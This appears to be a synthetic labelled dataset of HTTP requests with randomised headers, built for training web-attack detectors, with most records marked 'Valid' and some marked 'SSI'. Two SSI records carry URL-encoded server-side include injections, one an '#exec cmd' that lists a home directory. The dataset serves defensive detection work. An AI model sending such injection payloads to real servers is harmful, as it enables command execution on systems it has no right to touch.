Proxy-Authorization: Digest response="22F540Ff1cB74c8F64522Ac09e9adb6F"
Authorization: Basic NmxpRnJkbDplQWU2
Range: -68,-771672
Referer: /f5matwn/se4f.bin
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 2.0; es-ek; rv:5.9.9) Gecko/20619316
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: HTTP/6.6 www.tiydis.htm:3366, 1.0 www.en0rorO1.tiff, HTTP/7.2 250.255.77.19:18
Transfer-Encoding: identity
Upgrade: gETaD/6.4, von/5.0, mwsig/3.5
Warning: 007 www.rlynhI0s.htm "stzsletotoM5len" "Thu, 03 Jul 08 20:03:46 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 454901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32326
Start - Id: 39986
class: SSI
GET /p-kzXdE/tBcssePlnuyAab2dg/jK1S6hNRv4R/zLH4Ht/BuHvarYinXqdQ9-6/lbCotTdt_.Pn4ZleM/Bew9Iaetjjm4s/eoPcjX4Z/NbKQphpfqdlG7ink.cgi?crimendr=%3C%21--+%23exec+++cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2FAtsflldh4%2Fzelcne%22+++++--%3E HTTP/1.1
Host: www.Kehsri.com:06297
Connection: rsif
Accept: audio/basic;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: n-mee;q=0.5
Cache-Control: no-transform
Client-ip: 8.168.66.173
Cookie: khuleoeslNoy= d;hstlvetqhoemea=a l;1rlftl=8064305801;ojoudebegl5iao=aOqeifrDrRTin;bx1h2axbyN7acw5=0
Cookie2: $Version="941"
Date: Fri, 16 Dec 05 09:41:39 UTC
ETag: W/"_bPQwMT@Vkx-eIVQ"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: aNtti hpho=sbL68
Range: 618-573,4-,461-
Referer: http://ctatth.it/qagitohg/2AnhJst6/pta7tev/itEooti4.exe
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: 8WLmsg (ikPWtGho)
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 860x1351
Via: 5.1 225.118.131.159, EeOi/4.7 252.53.14.181, HTTP/7.4 130.212.95.161
Transfer-Encoding: deflate
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39986
Start - Id: 13623
class: Valid
GET /T6PIcC/Npassthrur.Ginput9selecteZcat.Tu/C1tic/uzryloo/idtnnbrslotrSstrlnr/gosvsA/aPGzefbt9a72X@3/eFhx./7SeesbTfueto/pRrhmcniinw7el/V_0BdlogO.png?DrevHc=4433&slcdniPe=eMda&arfeo=nLIouIVlKlcf&F7jmdrcRnodekG=EtR%3B&UetcIs-gG=3&alet56=cNrN0&etngEdhti=%25EDgq&u0=qm&st6t=lT37Nn&i7tashiipui=erfcbdhz&alehtenfs5rsona=%5CSt2stdnc3iteeo&xeei7cowiebmoe=h&na=ftpaeshnph-e+oteScpasswd&cwOrdncsIaxe=isisarbetweena1+miimgcd&sahessnfaN=92288 HTTP/1.0
Host: www.m6t9g.uk
Connection: close
Accept: application/postscript, text/plain, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: eslss-ze6l;q=0.2, nusub-6yhvy;q=0.4
Cache-Control: no-store
Client-ip: 63.99.161.90
Cookie: wpcetc=70861269;gaetiahecc=(;xotr4window.open=lbodyiip
Cookie2: $Version="685"
Date: Sat, 30 Jan 10 13:25:21 UTC
ETag: W/"AOW9jBnjTWv7dJ4"
Expect: 5Eds=8ltlnft8
From: ednsif0g@o99ssn.be
If-Modified-Since: Fri, 29 Jan 10 01:09:41 CET
If-Unmodified-Since: Mon, 12 Jan 04 10:51:19 UTC
If-Match: "R8RbRvBJbEL1xLdqlu"
If-None-Match: *
If-Range: "S-YRXpp@uYyHJH11F4"
Max-Forwards: 90
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: ndGos x8nr=hoadr
Range: 91-
Referer: /rAde/innrEtr/oanO/anvA/fvbe.swf
TE: trailers,trailers
Trailer: Warning
User-Agent: tw6hdnic (t5niGqduBD; n5H2gCwt)
UA-CPU: PowerPC
UA-Disp: 0811,7383,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: 0.9 17.237.191.224:95, HTTP/5.2 98.117.141.162, 9.5 6.158.0.112
Transfer-Encoding: deflate
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 7926590781102168
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13623
Start - Id: 11598
class: Valid
GET /96stetFH5eTR4j1/0b6lniEjTnbde/bDYaLy3GspR08I/xp_kSC.Fpgshutdownc8.js?eadslztpDf=0 HTTP/1.1
Host: www.terl.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.4, windows-1257;q=0.0, koi8, x-mac-cyrillic, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 0.218.149.249
Cookie: iyns4Sieoy=rtelikesP=IE;uc1sgEe=tn;slcoKoiss9ea=pna%lpen>vi&hnz;setiuuvwipq2n=t63suoa)l et:o
Cookie2: $Version="797"
Date: Fri, 14 Jan 05 05:34:25 CET
ETag: "e8rmXhPoopjryeZhvw3"
Expect: ieHlenh
From: EDcpa6@fUssmevbFt.be
If-Modified-Since: Tue, 16 May 06 24:18:05 GMT
If-Unmodified-Since: Mon, 04 Feb 08 20:31:14 CET
If-Match: "nSe_twqH0ttiMb65"
If-None-Match: *
If-Range: Thu, 14 Jun 07 19:27:57 GMT
Max-Forwards: 5
MIME-Version: 8.5
Pragma: hNa=i
Proxy-Authorization: Basic aUlpOTY6bGVpbg==
Authorization: Basic bmZubmh0aTpubXRtd3Nz
Range: 4539-2283,-21
Referer: /pivwme/ds7E/0meiecIr.tar.gz
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Mozilla/5.0 (compatible; Konqueror/7.5; Open BSD i386; iIml)
UA-CPU: x86
UA-Disp: 503,414,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3585x2586
Via: FTP/3.8 103.162.5.94
Transfer-Encoding: terfe; fVipp=caeu5o
Upgrade: vot/1.6
Warning: 451 www.po0to.tiff "IpT6h0ONe0T" "Sun, 10 May 09 06:25:33 GMT"
X-Forwarded-For: 96.138.208.138
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11598
Start - Id: 112
class: Valid
GET /wf5pFobdWkN7tB3/8njRds/NxjkQshutdowncbinZ2COy/xc8DuI4Kqq.jpg? HTTP/1.1
Host: 181.57.119.254
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 246.234.247.119
Cookie: Ioi=22685;jltks0eQo=dBRKHt4WB
Cookie2: $Version="879"
Date: Mon, 18 May 09 12:48:44 GMT
ETag: W/"igEY.YYC8Usd_R.GoUz"
Expect: 100-continue
From: sMiioa@t6dn.ch
If-Modified-Since: Tue, 22 Nov 05 09:59:07 UTC
If-Unmodified-Since: Thu, 05 Jun 08 05:58:24 GMT
If-Match: "MOuyG7xzR4Tzp1QeKfWc"
If-None-Match: *
If-Range: Thu, 14 Sep 06 08:02:58 UTC
Max-Forwards: 5000
MIME-Version: 1.3
Pragma: anh=nt
Proxy-Authorization: NTLM bGRsaWRzY2VpZW5ld01yc2xkb3c1UmFUbnBlY2tWZXR2bklnOWRNRQ==
Authorization: Basic ZWFwaDpFMG9udGVlZQ==
Range: -84012,-01335,-234
Referer: http://www.xdtmr7.gov/TdSerrs/nndEs/enohohoI.tiff
TE: deflate;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/1.8 (compatible; arynnr; Mac OS X; daoubdtnO; 7rRctdss)
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2972x378
Via: 6.1 200.255.217.91, FTP/6.0 www.pnebyhe.jpg, 9.8 108.54.255.226
Transfer-Encoding: nger3
Upgrade: gboEt/1.0, yTh/2.4, i8pth/2.0, grs/4.8, Gwwso/1.0
Warning: 072 208.33.148.233:391 "ceisHREdehQstgAa" "Wed, 04 Jul 07 07:49:02 GMT"
X-Forwarded-For: 175.234.36.217
X-Serial-Number: 74970351581
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 112
Start - Id: 27771
class: Valid
GET /tz-sp-yIa8M.jpeg? HTTP/1.1
Host: 50.116.156.98
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip;q=0.1, deflate, gzip, gzip
Accept-Language: toaei-aLrilla;q=0.3, ur-nead;q=0.4, ueeti-hidR;q=0.2, teeDtel-ma;q=0.4
Cache-Control: no-store
Client-ip: 241.95.65.214
Cookie: ub=euca;ese2hklgcouA=ned;8y1lttfcmcoes=9@QM;fYYJ=yHgDgroup by;ZFAxmletcIRE=iPBm
Cookie2: $Version="75"
Date: Mon, 11 Jul 05 01:30:52 GMT
ETag: W/"0uqynEnDZO61uWa2vj"
Expect: latp
From: r0awnRge@eespk.it
If-Modified-Since: Sun, 20 Dec 09 24:36:33 CET
If-Unmodified-Since: Thu, 29 Jan 04 23:31:47 UTC
If-Match: "dTZ7kuryoiXTrShN0PZ"
If-None-Match: *
If-Range: "klVcLVFxT0vDFqG0R5R"
Max-Forwards: 5902
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM OW1sc2hlZWo3ZTN5YnNvZWFpbmZ3cm1ydHJ1b3dhbmVvM2ViYW1BaHM=
Authorization: eadbm edgaiSl=82un0
Range: 360141-,-759683
Referer: /sdhm.avi
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (compatible; MSIE 1.3; Win98; oqeoPFe8; dirIq; aitt)
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 483x5740
Via: HTTP/8.5 www.uiyhspq.jpg, 3.8 244.220.219.184
Transfer-Encoding: identity
Upgrade: iJs/5.8, o33/4.6
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 213.115.160.45
X-Serial-Number: 00771445760189664084
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27771
Start - Id: 12004
class: Valid
GET /a7dso/htaccesBh1I7binJ-D/hCXK/tAHlzx4IOh/hODEh6qPxfuabtGI-V3/vNPV5TD5KCO_4lXkyagm/e97/bliefsi70ethw4/tWphpe/0krdZlNRVYt.6e0fMrs/coGemhzah/fanfflnniim.js?eznjr4Clnhoea=20&ehCnakqu8tbfStt=+services2&etmad=31549560&hdVArJ=ihredCbdxtfvoer&osxaor=sea-UEs5Z+&ja=2&rnme=lBgNW2yL1CE5&rgses6lyde=k-lz8&o7hk=1 HTTP/1.1
Host: www.4lL2naO.fr:17584
Connection: close
Accept: video/mpeg;q=0.2, video/quicktime;q=0.0
Accept-Charset: euc-cn;q=0.7, hz-gb-2312;q=0.8, x-mac-turkish, windows-874;q=0.1
Accept-Encoding: *
Accept-Language: ddc-adoewonr, Wnedoiye-dolu;q=0.2
Cache-Control: only-if-cached
Client-ip: 161.39.42.158
Cookie: ee5=>4rzd a4iselectp ;nhrd=>ox@oj2aeCleS;tae;_dm0l2i9HbinD=e.57V9dOD9
Cookie2: $Version="28"
Date: Tue, 22 Feb 05 22:27:27 UTC
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: ecltistt@earirni.gov
If-Modified-Since: Fri, 06 Feb 04 03:55:55 UTC
If-Unmodified-Since: Sat, 10 Oct 09 22:14:10 CET
If-Match: *
If-None-Match: "pfFXJBCs91F2yJaM"
If-Range: "vk40kbpJK9fDhFl"
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -8,856500-,-6463
Referer: http://inNergqi.biz/ogu3/3isEt/yfdwpuu/a3os/tqnceh.gif
TE: trailers
Trailer: Accept
User-Agent: ceees24/4.6.9.9
UA-CPU: x86
UA-Disp: 216,5024,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 165x736
Via: ok8cg/8.7 www.iww5gt.shtml
Transfer-Encoding: compress
Upgrade: mied/2.1, ubr6/9.8, kedlo/6.1, ohn/1.7, Ncaq/5.3
Warning: 262 www.itetharh.css "tdqd4ieaDLErnog" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 064922908
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12004
Start - Id: 13341
class: Valid
GET /vnHgW/htaccestBv5.nsf?sn0iosntwg=nhoqgneb6&nihmtas=sUEVc%40VAur9&ftALacrwoki18iu=%24xp_td&w5dalOkbaeiuqn=18079383&cxsdo4=%28ip&kbgfpu=8416&AYtifap96=30&c2ndniittm4ps=9262859&lsctlghht=4dI&aUon=ei6ym4oeoe7no4&YQA1Wx_jq=duornp5in4oamdnn&cPAfX6NrF-=ths&gnipes8Tesf5c=8962709&arr=o-%29i1ssedbetween+eles HTTP/1.1
Host: www.hEzyorz.be:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-phe;q=0.7, qat-tcnlOp;q=0.6, htoqenu-jiE;q=0.2, 96x-Go;q=0.9, LhusDxN-oeri7so9
Cache-Control: no-transform
Client-ip: 42.70.218.26
Cookie: etzab=51;nreunhneowht=tbeCuk;itgthar6=8009;zi6l2bb=vmz0ctmH]
Cookie2: $Version="012"
Date: Mon, 30 Aug 04 13:39:25 CET
ETag: W/".yUJODkEXkhnKuu"
Expect: eU45eS
From: qyfmaeSc@eieatsEee.st
If-Modified-Since: Sun, 24 Sep 06 21:36:46 UTC
If-Unmodified-Since: Sun, 17 Feb 08 18:19:51 UTC
If-Match: "A-InsQrWTheAQrh7"
If-None-Match: "RaLxJEY@sr-eBEn3p."
If-Range: Fri, 17 Aug 07 14:11:40 UTC
Max-Forwards: 556
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM T2ZlbW9lZmRvZWVsb2RkdDZLYTR0RWV0OWNhNGU4T0hjaW9E
Authorization: NTLM MFVQZDBlaWtMaWdhM2x3UnNleGU4c3RBZmViZmFuYWdhaEFyZWVFTG9hTjV2b1I=
Range: 30510-65,097-,-5721
Referer: /leeh/ohueWs/LRoueha/t9w6s.asmx
TE: deflate,trailers
Trailer: Date
User-Agent: pathem
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 643x366
Via: 1.9 www.napsw.tiff, HTTP/2.5 141.231.189.186
Transfer-Encoding: deflate
Upgrade: arbqe/0.4, stO/8.7, nMx/4.4, ioMi4D/1.1, oChir/3.9
Warning: 105 82.198.116.45:3 "hoxes55lrxllms" "Fri, 09 Dec 05 21:04:04 GMT"
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 52905795752439402910
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13341
Start - Id: 11256
class: Valid
GET /Zxmlzjcat7/oyydi8t/shaiaOameie/Rtswaiosgxd3h0nLaiei/Etuonem/sF1kgBFX58ZpgdtC/CvE/arWhaezch/sZL2n8QU/5U8sUhc0XyKKy/sB9OdihO.htm?ah0fdoX8=933&0oIeu66eiene=9&r2bx=8644&ofvjt7avcexeiaA=rhowAacs%29 HTTP/1.0
Host: www.p9oyTech.com
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, euc-tw;q=0.9, x-mac-roman, x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=82213
Client-ip: 49.40.111.24
Cookie: M5cZgroup byt9h.fE=>a;YeZcdm4I@E=saft;fersrg=aytdeighePr;d4RC=49wa4aoHqM8o;HNqvqZ_AqYEphp=na;rtetia2e=sTxz_4nVp_
Cookie2: $Version="475"
Date: Wed, 29 Dec 04 24:02:04 UTC
ETag: "r6cFlT69xgKl84H"
Expect: e7exuse9
From: aarli@mLmeltu.be
If-Modified-Since: Sat, 05 Jul 08 07:14:18 GMT
If-Unmodified-Since: Fri, 11 Jun 04 09:43:24 CET
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: *
If-Range: *
Max-Forwards: 597
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: tpjet hwob=9Dg0z
Range: 394051-208299
Referer: /ibEmv.php4
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: pwnsf (oArNMld5j-)
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 234x2210
Via: 7.6 142.84.149.157, 4.4 243.98.93.95
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 582 84.110.116.229 "aokaesAu1ilha" 
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 818941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11256
Start - Id: 26359
class: Valid
GET /and5MPNNSe/w@66/yf./Eee8ie3n/b_/s5teelsanneDcOsakxs/Zl/soteoeunz2brN/amOcv/s.3b/tXNG2.N8b5/_Bpp.php4?nanaaVg2r=l&EmW0childgroup by=tL-JirjotR&re=ulSMe7&1gewnsnprnoDAt=mdNabLhvywicreru&mseloantyiiif2=883767&letainai1=omNriln%2F+ipasswdv3e1%40a%5Do&hhe=8881&gmtSvSnsh=bgtN HTTP/1.0
Host: 162.55.15.104
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 233.51.29.84
Cookie: wJW.KAAh=4356480914;ih2=dusmn;oMwp-SpMbgsound=mdket;MtplttiEsyzos=ty+/
Cookie2: $Version="106"
Date: Fri, 30 Apr 10 12:50:44 CET
ETag: W/"uLZhpVgPU3Egln."
Expect: kC3i=Ctt9few
From: msbhi@o4kOyntt.uk
If-Modified-Since: Sun, 01 Nov 09 04:42:23 CET
If-Unmodified-Since: Thu, 30 Sep 04 24:19:24 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Feb 10 03:26:24 GMT
Max-Forwards: 75
MIME-Version: 6.8
Pragma: fpse00u=aaree
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Digest cnonce="tsbneba"
Range: 7-,8-
Referer: http://www.iqoHuCe.fr/eedasrsa/bsvm/ysda/ssaye.sh
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (compatible; MSIE 2.8; Linux i386; ofcuee; Geno)
UA-CPU: 68000
UA-Disp: 4074,748,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1527x4298
Via: 5.1 www.t6iicoie.css, 2.0 www.slea.css:46626
Transfer-Encoding: identity
Upgrade: f3i/7.2, 4xgd/4.9, 4m3er7/4.0, uiai/5.6
Warning: 900 33.197.164.138 "2Ht9Fspan" "Tue, 08 Feb 05 10:29:57 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 683890347
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26359
Start - Id: 27619
class: Valid
GET /GrfieiOvrxk/6Afofnyerelnwotlaat/asie6rhhYdl/TeDdrop.TWR/1jnilg.gif? HTTP/1.0
Host: 228.141.116.12:1
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 60.217.205.251
Cookie: tsseouu=885;s4srnOe2maEtj1=71;Mamisscm=uFUwtILhO;replaceopenLMwp8=gk
Cookie2: $Version="35"
Date: Mon, 07 Feb 05 08:00:28 CET
ETag: W/"Q7FDirU-IyamM8-k"
Expect: 100-continue
From: 06wy8l@mtedC.de
If-Modified-Since: Sat, 08 Aug 09 11:21:55 GMT
If-Unmodified-Since: Sat, 30 Jul 05 16:51:04 CET
If-Match: "sskGDEsTKTMV-_leKUC"
If-None-Match: *
If-Range: ".hZ53Z@.cCKqFKKodVbK"
Max-Forwards: 4
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Susn wVBdeE=neSgPhy
Authorization: NTLM YmJudGR0bGVhd1lpb3dpaDh0YjFzTHVzZWd1ZWhScHRsOHNuYW4=
Range: 0-4
Referer: /hay0U9as/elarme.exe
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: iXFic4b
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: FTP/4.2 38.118.205.129, 8.0 www.eqds.tiff:5925
Transfer-Encoding: compress
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 50.49.67.245
X-Serial-Number: 189697977036477
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27619
Start - Id: 32767
class: Valid
PUT /hbldit4nh6Era/ssboxetitinnn6aqdtJ/s61enttPteh/nnw5iy9ettmt/eA-@O.dll? HTTP/1.1
Content-Length: 116
Content-Language: tjnjaotx
Content-Encoding: identity
Content-Location: /soah3/uc0it4e/sDtpy/boeGpd9.pl
Content-MD5: YXNib3NzaWQ2ZWUyYWlwbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Oct 04 14:19:31 UTC
Last-Modified: Wed, 17 Jun 09 14:10:49 CET
Host: www.rnrldtrtU.cz
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 68.202.181.199
Cookie: fu1a6eaeftbswj=3054;d9l2rf6uyi=detisnhd30cdpdBq;b4pds3urcp@%uS=2%29l%22bE%2Fs4o%3Asue%22f;9yeCw=stuan;imyoei=aKR4AXhJtxir
Cookie2: $Version="4"
Date: Sun, 23 Jul 06 19:27:13 CET
ETag: "iZ8m4dCHifFiyoUCsppk"
Expect: poeint
From: eadg@itnjs.uk
If-Modified-Since: Thu, 14 Feb 08 07:01:35 GMT
If-Unmodified-Since: Mon, 30 Mar 09 06:43:42 UTC
If-Match: *
If-None-Match: "HzSa-u-CU-T6NiBtwehv"
If-Range: Sat, 22 Sep 07 13:56:52 UTC
Max-Forwards: 40
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: Digest algorithm=MD5
Range: 7780-1621,55-
Referer: http://www.s5not1a.fr/sltiaat/sannthh/eisie.pdf
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: ihuCiOaj/7.4
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4217x4135
Via: egsea/7.2 202.84.23.234, HTTP/8.4 252.116.162.153:05451
Transfer-Encoding: identity
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st0nvDNubrese5=ro3ca/\3&gi8@xY=4nqeihote5&haoh3otnEmegN=oxcddn7enieew3&0xformE-qNoLyH=e7 &lv=inputwvfeestdiniee6

End - Id: 32767
Start - Id: 17630
class: Valid
GET /I8J705v_UGXDv/fYEnnconnectTe.a.php2mG/s4NuTD4p1/pcdrayyen/nh5/utoAhtPdee5temmed/rtelrrstuesr/kZD4AB/c-wlPIC9JtH7O@/tfM/shsayuSiwiticwDdtn/ittseedau6sTascne7.pl?tasdTncTxoex5br=odrop3%3Cgroup+byu1hETtpxmlnsoHmie HTTP/1.1
Host: 105.112.84.192
Connection: keep-alive
Accept: audio/*;q=0.8, video/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rsnizuo-Ni1;q=0.4, eds-a, snruallT-nc;q=0.6, o-twao, choanW-kna;q=0.9
Cache-Control: max-stale
Client-ip: 56.224.2.13
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="65"
Date: Fri, 18 Dec 09 19:51:19 CET
ETag: W/"z1QmfgMu-ng6LclTRcp"
Expect: e0xie=imStOau
From: iahevs@1t8no.ch
If-Modified-Since: Sun, 30 Nov 08 03:19:30 CET
If-Unmodified-Since: Sat, 14 Jun 08 14:52:42 UTC
If-Match: *
If-None-Match: *
If-Range: ".El1tjtxMzKg81m.u"
Max-Forwards: 2652
MIME-Version: 8.1
Pragma: rwhsheo=ELnoed
Proxy-Authorization: NTLM aGVoYXJyZnRlMGV3b3E3UnRldGhhbnNlc2Vobm55ZW50Z2RiOHI=
Authorization: 4qlo s67bt=6pnC
Range: -948
Referer: /e1h7D/ntdt/iilrt7/g9rae5/snoss.asp
TE: trailers,trailers
Trailer: Connection
User-Agent: 1ac0sheacr/4.7
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 519x8664
Via: FTP/8.0 188.88.129.91
Transfer-Encoding: identity
Upgrade: H9sne/9.0, ib5En9/0.4, Atedk/3.6, sfas8h/8.7
Warning: 037 www.tflm.htm:40429 "fajas1yd" 
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17630
Start - Id: 39282
class: SSI
GET /rds_cTsPQS/pZ1xEIqS@VgA7EK/fRs5/ssaxhepb1Uf0osgrMih/QYFGrnqgroup byjfk/mceeieaeed3triKlwhob.shtml?rnrira=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.neoeseeuE2.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=70535
Client-ip: 178.60.27.113
Cookie: uc=7asOooi
Cookie2: $Version="4"
Date: Sat, 23 Jul 05 10:59:51 CET
ETag: "t7BklJYd9L3k2qZkG"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Sun, 29 Nov 09 22:40:49 UTC
If-Match: "LNa1AR5Wnc_yTtcdoE9"
If-None-Match: *
If-Range: Thu, 04 Mar 04 02:49:47 GMT
Max-Forwards: 63
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Basic ZXVlZTQ6dG9oU2w=
Range: 3-
Referer: /g9bt/dSede/elphsmnn/Ehmh/pop6.gif
TE: trailers
Trailer: Via
User-Agent: e0hUY.ouIu http://www.leloel.gov
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: tooar; ho4otdf=ihrn
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39282
Start - Id: 45785
class: PathTransversal
